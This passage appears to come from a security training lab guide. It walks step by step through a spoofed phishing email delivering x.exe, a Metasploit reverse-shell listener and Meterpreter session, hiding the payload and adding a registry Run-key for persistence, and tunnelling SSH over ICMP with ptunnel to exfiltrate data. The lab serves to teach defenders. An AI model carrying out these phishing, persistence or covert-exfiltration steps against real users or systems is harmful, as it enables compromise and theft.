Answer

Task 36
From the Outside Kali host, click the Icedove icon on the left to launch Icedove. Icedove is the Mozilla's open
source email client product.

Click Write to compose an email:

1. Drag and drop the x.exe file into the header area of the email so that it becomes an attachment.
2. From: Click and select Customize From Address. Change the sender to Kevin <kevin@abc.public>.
3. To: wendy@abc.public
4. Subject: That’s a cool game!
5. Body: Hey Wendy, Remember that cool game? I attached it. It's lots of fun!
Your friend Kevin
6. Click Send.

Answer
Task 37

From the Outside Kali host, launch a Metasploit listener on port 4444 that will accept the reverse connection once the
malicious attachment is opened. Click the MetaSploit Framework icon (M on the Shield) on the left to launch the MSF
console (msf >), then enter the following to start the Metasploit listener on port 4444.

msf > use exploit/multi/handler

msf exploit(handler) > set lhost 209.165.200.235
lhost => 209.165.200.235
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > run

[*] Started reverse TCP handler on 209.165.200.235:4444

[*] Starting the payload handler...
Task 38

Access the Inside Windows host console. Open the Thunderbird mail client. Open the email from Kevin and save the
x.exe attachment to the desktop.

Answer
Task 39

Launch x.exe. Of course, there is a warning. Uncheck the box for “Always ask before opening this file.” This is required
in order for the next task to work as expected.

Answer

Note: To the user, nothing seems to happen when the x.exe file executes.
Task 40
Return to the Outside Kali host. You should see that a Meterpreter session is established between
209.165.200.235 (Outside Kali host) port 4444 and 192.0.2.2 (Inside Windows host NAT translated public IP
address).

Answer

[*] Sending stage (957999 bytes) to 192.0.2.2

[*] Meterpreter session 1 opened (209.165.200.235:4444 -> 192.0.2.2:1708) at 2016-09-27
13:51:39 -0700

meterpreter >
Task 41
Enter the sysinfo and the getuid commands to verify that you have a reverse connection open to the Inside
Windows host as the admin user.

Answer

meterpreter > sysinfo

Computer : INSIDE-WIN
OS : Windows 10 (Build 10586).
Architecture : x64 (Current Process is WOW64)
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/win32

meterpreter > getuid

Server username: INSIDE-WIN\admin
Wendy, the mail recipient, logged in to the Inside Windows host as the local admin, not as the Wendy
account. Local admin is good! You got a standard Shell on the Inside Windows host when Wendy opened the
malicious attachment in her email.

Note

Leave the Meterpreter session running because you will need to use it in the next section of the lab exercise.

In a social engineering attack, an attacker uses human interaction (social skills) to obtain or compromise
information about an organization or its computer systems.

This section of the lab exercise demonstrated a simple but very common social engineering/phishing attack by
using email as the attack vector. If the victim is tricked into opening the malicious email attachment, the
victim’s machine will be compromised—and usually the victim is unaware that it has been compromised.

One of the best preventive measures against engineering/phishing attacks is to train users to protect
themselves, for example:

 Be very suspicious of unsolicited phone calls, visits, or email messages from individuals asking for
any sensitive information. If an unknown individual claims to be from a legitimate organization, try to
verify his or her identity directly with the company.
 Do not provide personal information, or information about your organization, including its structure or
networks, unless you are certain of a person's authority to have the information.
 Pay attention to the URL of a website. At first glance, malicious web sites and legitimate web sites
may look identical.

Establish Persistence
Similar to privilege escalation and pivoting, persistence is another core concept that is leveraged by threat
actors. Spawning a reverse connection is useful, but if the user does something to disconnect from the
network, such as a reboot, the attack reverse connection is terminated and may not be able to be initiated again
unless the attack can establish a persistence presence.

In this section of the lab exercise, you will use the reverse connection that you obtained in the previous lab
task to update the Inside Windows host registry setting so that the reverse connection launches whenever the
user logs into the Inside Windows host.

Task 42
From the Outside-Kali host existing Meterpreter session, enter the shell command to open a command line
on the Inside Windows host.

Answer

meterpreter > shell

Process 3640 created.
Channel 1 created.
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Users\admin\Desktop>
Task 43
The x.exe malicious email attachment from the previous steps should still be on the Inside Windows desktop.
Use the copy x.exe c:\logs command to copy the file to a less obvious location (in the logs directory).

Answer
C:\Users\admin\Desktop>copy x.exe c:\Logs
copy x.exe c:\Logs
1 file(s) copied.

Note the following:

 Once the attacker has compromised a system, they often perform tasks to hide their tracks.
 Attackers need to destroy evidence of their presence and activities for several reasons, such as being
able to maintain access and evade detection.
 It is imperative for attackers to make the system look exactly as it did before they gained access and
established back doors for their use.

Task 44
Add the hidden c:\Logs\x.exe executable to the run list in the Windows registry. Instead of typing in the long
command string in the example, you can copy and paste it from the AttackingEndpoints.txt file in the
SECFND folder on the DVD drive (Cyber).
C:\Users\admin\Desktop>REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V
"My App" /t REG_SZ /F /D "C:\Logs\x.exe"
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "My App" /t REG_SZ /F
/D "C:\Logs\x.exe"
The operation completed successfully.

Note the following:

 Editing the Windows registry setting to enable a malicious executable to run every time that the user
logs in is one example of how attackers can enable a persistence presence on the compromised host.

Task 45
Exit the session to the Inside Windows host in order to return to the Meterpreter session. Then put the
Meterpreter session in the background:

Answer

C:\Users\admin\Desktop>exit
exit

meterpreter > background

[*] Backgrounding session 1...
Task 46
Use the sessions command to verify that the Meterpreter session is in the background.

Answer

msf exploit(handler) > sessions

Active sessions
===============

Id Type Information Connection

-- ---- ----------- ----------
1 meterpreter x86/win32 INSIDE-WIN\admin @ INSIDE-WIN 209.165.200.235:4444 ->
192.0.2.2:1708 (10.10.6.10)
Task 47
Enter run to start a new listener.

Answer
msf exploit(handler) > run

[*] Started reverse TCP handler on 209.165.200.235:4444

[*] Starting the payload handler...
Task 48
Access the Inside Windows host desktop. Restart the Inside Windows host. Wait for it to come up. It will
auto-log in as admin. Immediately return to the Outside-Kali host. You should see that the background
Meterpreter session died when the Inside Windows host rebooted.

Answer

[*] Started reverse TCP handler on 209.165.200.235:4444

[*] Starting the payload handler...
[*] 10.10.6.10 - Meterpreter session 1 closed. Reason: Died
About a minute after the Inside Windows has been restarted, a new reverse TCP connection should launch and
you should have an active Meterpreter session again.
[*] 10.10.6.10 - Meterpreter session 1 closed. Reason: Died
[*] Sending stage (957999 bytes) to 192.0.2.2
[*] Meterpreter session 2 opened (209.165.200.235:4444 -> 192.0.2.2:1550) at 2016-09-29
14:46:44 -0700
Task 49
Enter the sysinfo and the getuid commands to verify that you have a reverse connection opened to the
Inside Windows host as the admin user.

Answer

meterpreter > sysinfo

Computer : INSIDE-WIN
OS : Windows 10 (Build 10586).
Architecture : x64 (Current Process is WOW64)
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/win32

meterpreter > getuid

Server username: INSIDE-WIN\admin

Note the following:

 This step validates that you have a persistence presence on the Inside Windows host. Even if the Inside
Windows host is restarted, the reverse TCP connection from the Inside Windows host (the victim) to
the Outside Kali host (the attacker) will still be successful.

Task 50
Exit the Meterpreter session.

Answer

meterpreter > exit

[*] Shutting down Meterpreter...
[*] 10.10.6.10 - Meterpreter session 2 closed. Reason: User exit

msf exploit(handler) > exit

root@Outside-Kali:~#

In this section of the lab exercise, we demonstrated how attackers can maintain a persistence presence by
hacking the Windows registry setting. There are many other ways attackers can use to maintain persistency,
for example, by hacking the basic input/output system (BIOS), hacking the boot sectors of a hard drive, using
Windows log on scripts, and using the Windows Task Scheduler.

Tunnel Exfiltrated Data

After taking advantage of a pivot, gaining access, making that access persistent, and escalating privilege, often
the end game of the threat actor is to exfiltrate data. A clever method of exfiltration is to tunnel the data. There
are several potential motives for utilizing tunnels. It may be that only certain protocols (like HTTP, DNS, or
ICMP for examples) are allowed through the firewalls. If a disallowed protocol is required to pass through the
firewall, it might be tunneled through an allowed protocol. Even if the required protocol is allowed, it might
be conspicuous. Tunneling the conspicuous protocol through a less conspicuous protocol may also be the
objective. Another reason may be to add a layer of privacy and obfuscation. SSH, SSL and IPsec are all
protocols that provide privacy. Tunneling through them can hide the data being exfiltrated.

This lab task will demonstrate tunneling exfiltrated data via an ICMP tunnel. To make this demonstration fit
within the time constraints of the lab, we will create an ICMP tunnel between the Inside Kali host (the tunnel
proxy client) and the Outside-Kali host (the tunnel proxy server), allowing the Inside Kali host SSH traffic to
be tunneled using ICMP echo request and echo reply packets.

SSH itself provides privacy. Using an ICMP tunnel hides the presence of the SSH traffic.

Task 51
From the Outside Kali host, enter the ptunnel command without any command options to start the ptunnel
proxy server on the Outside Kali host side.

Answer

root@Outside-Kali:~# ptunnel
[inf]: Starting ptunnel v 0.71.
[inf]: (c) 2004-2009 Daniel Stoedle, <daniels@cs.uit.no>
[inf]: Security features by Sebastien Raveau, <sebastien.raveau@epita.fr>
[inf]: Forwarding incoming ping packets over TCP.
[inf]: Ping proxy is listening in privileged mode.

Note the following:

 Ptunnel is an application that allows you to tunnel TCP connections to a remote host using ICMP echo
request and reply packets.

Task 52
Access the Inside Kali host, open a terminal window and enter the ptunnel -p 209.165.200.235 -lp 2222
-da 209.165.200.235 -dp 22 command to setup the ptunnel proxy client on the Inside Kali host side.

Answer

root@Inside-Kali:~# ptunnel -p 209.165.200.235 -lp 2222 -da 209.165.200.235 -dp 22

[inf]: Starting ptunnel v 0.71.
[inf]: (c) 2004-2009 Daniel Stoedle, <daniels@cs.uit.no>
[inf]: Security features by Sebastien Raveau, <sebastien.raveau@epita.fr>
[inf]: Relaying packets from incoming TCP streams.

The ptunnel -p option says where the proxy server is, -lp is the local port on the proxy client, and -da and
dp specify where the proxy server is supposed to forward the traffic that is leaving the tunnel. In this step, we
are only forwarding the traffic back to the Outside-Kali host (209.165.200.235) on port 22, but we could have
forwarded the traffic to anywhere that the Outside Kali host can reach.
Task 53

Launch Wireshark (Applications > 09 Sniffing & Spoofing > wireshark) on the Inside Kali host and start a packets
capture on the eth0 interface.

Task 54

On the Inside Kali host (ptunnel proxy client), open another new terminal window and launch SSH connecting to the
2222 local port on the localhost. Use Cisco123! as the password. This will cause the SSH traffic to be tunnelled inside
ICMP using the ptunnel.

root@Inside-Kali:~# ssh -p 2222 localhost

The authenticity of host '[localhost]:2222 ([127.0.0.1]:2222)' can't be established.
ECDSA key fingerprint is 63:38:d7:2c:51:d0:fe:f9:92:2d:e8:a7:30:7e:f2:e8.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[localhost]:2222' (ECDSA) to the list of known hosts.
root@localhost's password: Cisco123!

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent

permitted by applicable law.
Task 55

Examine the Wireshark packets capture on the Inside Kali host. You should not see any SSH traffic. You should see a lot
of ICMP echo/echo replies! You can do other things with this SSH connection, but this is enough to demonstrate the
tunnel.

Answer
Task 56
You may want to close things, such as Wireshark, and the ptunnel. Because this is the end of this lab exercise,
they are no longer needed.

In this Attack Endpoints lab exercise, you tunneled the SSH traffic inside an ICMP tunnel. Other common
protocols threat actors often use to tunnel their traffic include HTTP, HTTPS, DNS, and IRC. It is very
important for security analysts to be able to recognize the malicious tunneling activities, for example, by
examining packet captures for suspicious and unusual payload inside another protocol, such as DNS or ICMP.

You performed several ethical hacking experiments, focusing on attacking the endpoints. As an entry level
security analyst, you should be aware of some of the basic techniques and methods that attackers use to:

 Perform their network reconnaissance

 Exploit system misconfigurations and system flaws
 Install a back door for establishing connectivity to the victim’s machine
 Escalate their access privilege
 Pivot to other systems to expand their footprint
 Use social engineering and phishing to lure the victims into their traps
 Establish a persistence presence on the victim’s machine, so that even if the victim’s machine is
rebooted, the attacker still has control over the victim’s machine
 Hide their traffic by tunneling it inside another protocol that is permitted by the firewall, and is less
likely to be inspected, such as tunneling inside DNS or ICMP